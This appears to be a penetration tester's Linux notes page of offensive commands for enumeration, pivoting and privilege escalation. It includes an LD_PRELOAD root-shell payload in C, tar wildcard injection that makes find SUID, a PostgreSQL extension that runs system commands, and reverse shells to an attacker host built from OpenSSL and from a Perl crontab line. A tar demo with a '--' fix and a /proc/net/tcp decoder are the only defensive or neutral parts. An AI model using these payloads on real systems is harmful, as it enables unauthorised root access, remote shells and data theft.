Linux Notes


Scripts

General

Get capabilities:

/sbin/getcap -r / 2>/dev/null

Get SUID binaries:

find / -perm -u=s -type f 2>/dev/null

Check sudo configuration:

sudo -l
cat /etc/sudoers

Check which processes hold a file open:

fuser <filename>
lsof <filename>

Check for unmounted disks (block devices present in /dev but without a mountpoint):

ls /dev
lsblk

Bash port scan:

# /dev/tcp is a bash feature; the 2>/dev/null hides "Connection refused", >> appends
# instead of overwriting the result file, and timeout keeps filtered ports from hanging the loop
for p in {1..65535}; do timeout 1 bash -c "echo > /dev/tcp/<ip>/$p" 2>/dev/null && echo "port $p is open" >> scan; done

Using gateway-finder to find hosts on the segment that route to the Internet (rogue gateways); the file fed to -f is the arp-scan output:

arp-scan -l | tee arp.txt
python gateway-finder.py -f arp.txt -i <public ip>

Mount vmdk file:

modprobe nbd max_part=16          # max_part makes the partition devices (nbd0p1, ...) appear
qemu-nbd -r -c /dev/nbd0 <name>.vmdk
mount -o ro /dev/nbd0p1 /mnt      # same nbd device as above; -r/-o ro keep the evidence untouched
umount /mnt && qemu-nbd -d /dev/nbd0

Find files by date:

find / -newermt "<start-date>" ! -newermt '<end-date>' 2>/dev/null

Get proper tty on shell:

# stty method
python -c "import pty; pty.spawn('/bin/bash')"
ctrl+z
stty raw -echo
fg
<enter>
<enter>
# rlwrap method
rlwrap <command>

Pivoting

Meterpreter port forwarding (inside session):

portfwd add -l <localport> -p <remoteport> -r <target host>

SSH static port forwarding (single port, execute on attacker; connections to local 8888 reach <internal ip>:<internal port> as seen from the pivot):

ssh <user>@<pivot> -L 127.0.0.1:8888:<internal ip>:<internal port>

SSH Dynamic Port Forwarding (execute on attacker):

ssh -D <localport> user@host

SSH remote forwarding (execute on victim; exposes <ip>:<rport>, as reachable from the victim, on the attacker's <lport>):

ssh -N -R <lport>:<ip>:<rport> user@attacker

Configure proxychains (only the [ProxyList] entry at the end of the config needs to change; socks5 works as well with ssh -D):

socks4  <ip> <port>

Use proxychains:

proxychains -f pivot.conf <tool> <params>

SSH Jumphosts (port forwarding through multiple hosts):

ssh -J jumpuser1@jumphost1,jumpuser2@jumphost2,...,jumpuserN@jumphostN user@host

Socat example: forward every connection arriving on local port 5000 to <target ip>:5001

./socat tcp-listen:5000,reuseaddr,fork tcp:<target ip>:5001

Function Hijacking

LD_PRELOAD

Check whether you can write into the library search path of privileged binaries (RPATH/RUNPATH, the directories in /etc/ld.so.conf.d, LD_LIBRARY_PATH); if so you may be able to abuse the library load order. List the functions a binary imports with objdump -T. The dynamic loader ignores LD_PRELOAD paths for setuid binaries, so the preload route goes through sudo: /etc/sudoers must contain env_keep += LD_PRELOAD (sudo strips the variable otherwise; sudo -l shows the env_keep settings).

Preload example payload:

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>       /* setuid, setgid */

/* _init runs when the library is loaded; -nostartfiles keeps crt's own _init out of the way */
void _init() {
    unsetenv("LD_PRELOAD");   /* don't preload ourselves into the spawned shell again */
    setgid(0);
    setuid(0);
    system("/bin/sh");
}

Compile preload example payload:

gcc -fPIC -shared -o /tmp/payload.so payload.c -nostartfiles
sudo LD_PRELOAD=/tmp/payload.so <target>    # <target>: any binary the sudoers rule lets you run

When playing with the linker configs (/etc/ld.so.conf, /etc/ld.so.conf.d/) run ldconfig afterwards, or the linker cache won't pick up the change.

Abusing Common Tools

A nice collection of abusable tools can be found at GTFOBins (https://gtfobins.github.io).

Abusing Tar

If a privileged job (a sudoers rule or a root cron job) runs tar with a shell wildcard, e.g. tar czf backup.tgz *, in a directory we can write to, the shell expands the wildcard before tar sees it, so filenames that look like options are parsed as options. Create the following setup in that directory:

-rw-r--r--. 1 xxx xxx  0 Oct 28 19:19 --checkpoint=1
-rw-r--r--. 1 xxx xxx  0 Oct 28 19:17 --checkpoint-action=exec=sh payload.sh
-rwxr-xr-x. 1 xxx xxx 12 Oct 28 19:17 payload.sh

To create the files use:

echo "chmod u+s /usr/bin/find" > payload.sh
echo "" > "--checkpoint-action=exec=sh payload.sh"
echo "" > --checkpoint=1

Using find as the payload is handy because a SUID find executes arbitrary commands: find f1 -exec "whoami" \; (the file f1 must exist). For a shell use -exec /bin/sh -p \; since bash drops the effective uid unless started with -p.
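The wildcard injection above, as an added demo that is not part of the original notes: it creates the three files in a scratch directory, runs the backup the way a careless job would (tar cf archive *) and the way it should be written (tar cf archive -- *), and reports whether the payload ran. The payload only drops a MARKER file (a stand-in for the chmod u+s above); the scratch directory, the MARKER name and GNU tar being installed are assumptions of this demo.

```sh
#!/bin/sh
# Added demo of the tar wildcard injection (not from the original notes).
# A "privileged job" archives a directory with  tar cf <archive> * ; the shell
# expands * and hands tar the attacker's filenames as if they were options.

# Scratch directory with the three attacker-controlled files.
# payload.sh only creates MARKER (stand-in for chmod u+s /usr/bin/find).
setup_dir() {
    work=$(mktemp -d) || return 1
    printf 'touch "%s/MARKER"\n' "$work" > "$work/payload.sh"
    : > "$work/--checkpoint-action=exec=sh payload.sh"
    : > "$work/--checkpoint=1"
    printf '%s\n' "$work"
}

# Report whether the payload ran, then remove the scratch files.
check_and_cleanup() {
    if [ -f "$1/MARKER" ]; then echo "payload executed"; else echo "no execution"; fi
    rm -rf "$1" "$1.tar"
}

# Vulnerable job: * expands (sorted) to
#   --checkpoint-action=exec=sh payload.sh  --checkpoint=1  payload.sh
# tar treats the first two as options and runs "sh payload.sh" at checkpoint 1.
vulnerable_job() {
    dir=$(setup_dir) || return 1
    ( cd "$dir" && tar cf "$dir.tar" * ) 2>/dev/null
    check_and_cleanup "$dir"
}

# Hardened job: "--" ends option parsing, so the same names are plain file
# arguments. Archiving the directory itself (tar cf a.tar -C "$dir" .) avoids
# the glob altogether.
hardened_job() {
    dir=$(setup_dir) || return 1
    ( cd "$dir" && tar cf "$dir.tar" -- * ) 2>/dev/null
    check_and_cleanup "$dir"
}

echo "wildcard job: $(vulnerable_job)"
echo "with '--':    $(hardened_job)"
```

The two runs differ only in the `--`; everything else, including the file names, is identical, which is the whole point: the defence belongs in the privileged command line, not in the directory contents.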

Abusing TCPDump

tcpdump's -z <command> runs <command> on every capture file that gets rotated (the file name is passed as the argument), so combined with -w, -W 1 and -G 1 a sudo-able tcpdump executes the command as root after one second.

Abusing OpenSSL

openssl can read files and ship them over the network (s_client / s_server), so it can be used for data exfiltration and infiltration. A bind or reverse shell can also be built from it; the target half of a reverse shell on Windows looks like the following, with an openssl s_server listener on the attacker side for each of the two connections (one carries input, the other output):

openssl.exe s_client -quiet -connect <ip>:<port1> | cmd.exe | openssl.exe s_client -quiet -connect <ip>:<port2>

Rsync

If an rsync module is writable as root (check the module listing for writable system paths), one gets RCE by uploading a crontab entry. The line below uses the /etc/crontab and /etc/cron.d format (note the user field) and opens a reverse shell:

* * * * * root perl -e 'use Socket;$i="<ip>";$p=<port>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Download folder:

rsync -r rsync://user@ip/<remote_dir>/ .

Upload folder (drop -6 unless the target is reached over IPv6):

rsync -vvaP -6 <local dir> "rsync://user@ip/<remote dir>"

Load postgres shared library (needs a database superuser; the dev package must match the server's major version, here 11):

sudo apt-get install postgresql-server-dev-11

xct.c:

#include "postgres.h"
#include "fmgr.h"
#include "utils/builtins.h"   /* cstring_to_text */
#include <stdlib.h>

#ifdef PG_MODULE_MAGIC
PG_MODULE_MAGIC;
#endif

PG_FUNCTION_INFO_V1(exec);

/* runs <cmd> as the OS user the database server runs as (usually postgres) */
Datum exec(PG_FUNCTION_ARGS) {
    int rc = system("<cmd>");
    PG_RETURN_TEXT_P(cstring_to_text(rc == 0 ? "ok" : "failed"));
}

Compile, then load and call it from SQL:

gcc xct.c -I`pg_config --includedir-server` -fPIC -shared -o /tmp/xct.so
CREATE OR REPLACE FUNCTION exec() RETURNS text AS '/tmp/xct.so', 'exec' LANGUAGE C STRICT;
SELECT exec();

NFS Shares

NFS with the default AUTH_SYS trusts the numeric uid/gid the client sends. After mounting a share with mount <ip>:/<path> <folder>, impersonate a user by acting on the mount as a local user with the same uid as the account you want on the target box: the server only matches uids when checking permissions. This includes root when the export is configured with no_root_squash (check showmount -e <ip> and the server's /etc/exports).

Networking

Show listening ports without netstat (local_address in /proc/net/tcp is the little-endian hex address, state 0A is LISTEN; strtonum needs gawk):

awk 'NR>1 && $4=="0A" {a=$2; x=strtonum("0x"substr(a,7,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr(a,i,2)); print x":"strtonum("0x"substr(a,index(a,":")+1,4))}' /proc/net/tcp
ss -tlnp
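The same decoding as a plain POSIX sh script, added here as an example that is not part of the original notes, for boxes that have neither gawk nor ss. It reverses the little-endian address bytes, keeps only sockets in state 0A (LISTEN) and is run below against a constructed sample in /proc/net/tcp layout rather than a real capture; on a live box feed it /proc/net/tcp instead.

```sh
#!/bin/sh
# Added example (not from the original notes): decode /proc/net/tcp by hand.

# Turn one address field ("0100007F:0016") into "127.0.0.1:22".
# The kernel prints the IPv4 address as a little-endian hex word, so the four
# bytes are reversed; the port is big-endian and decodes directly.
decode_addr() {
    hex=${1%%:*}
    port=${1##*:}
    b1=$(printf '%s' "$hex" | cut -c1-2)
    b2=$(printf '%s' "$hex" | cut -c3-4)
    b3=$(printf '%s' "$hex" | cut -c5-6)
    b4=$(printf '%s' "$hex" | cut -c7-8)
    printf '%d.%d.%d.%d:%d\n' "$((0x$b4))" "$((0x$b3))" "$((0x$b2))" "$((0x$b1))" "$((0x$port))"
}

# Read /proc/net/tcp-formatted lines on stdin and print listening sockets.
# Columns: sl local_address rem_address st ...; the header line is skipped and
# only state 0A (LISTEN) is kept.
listening_sockets() {
    while read -r sl laddr raddr st rest; do
        [ "$sl" = "sl" ] && continue
        [ "$st" = "0A" ] || continue
        decode_addr "$laddr"
    done
}

# Constructed sample in /proc/net/tcp layout (not captured from a real host):
# sshd listening on 127.0.0.1:22, something on 0.0.0.0:8080, and one
# ESTABLISHED (state 01) connection that must be filtered out.
SAMPLE='  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0100007F:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12345 1 0000000000000000 100 0 0 10 0
   1: 00000000:1F90 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 12346 1 0000000000000000 100 0 0 10 0
   2: 0100007F:A1B2 0100007F:0016 01 00000000:00000000 00:00000000 00000000  1000        0 12347 1 0000000000000000 20 4 30 10 -1'

sample_listeners() {
    printf '%s\n' "$SAMPLE" | listening_sockets
}

# Live use:  listening_sockets < /proc/net/tcp   (and /proc/net/tcp6 for IPv6)
sample_listeners
```

/proc/net/tcp6 uses the same layout with 32 hex digits per address (four little-endian 32-bit words), so the byte reversal has to be applied per word there.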

MitM Packet Installation

See notes on OneTwoSeven.

Interesting Reads
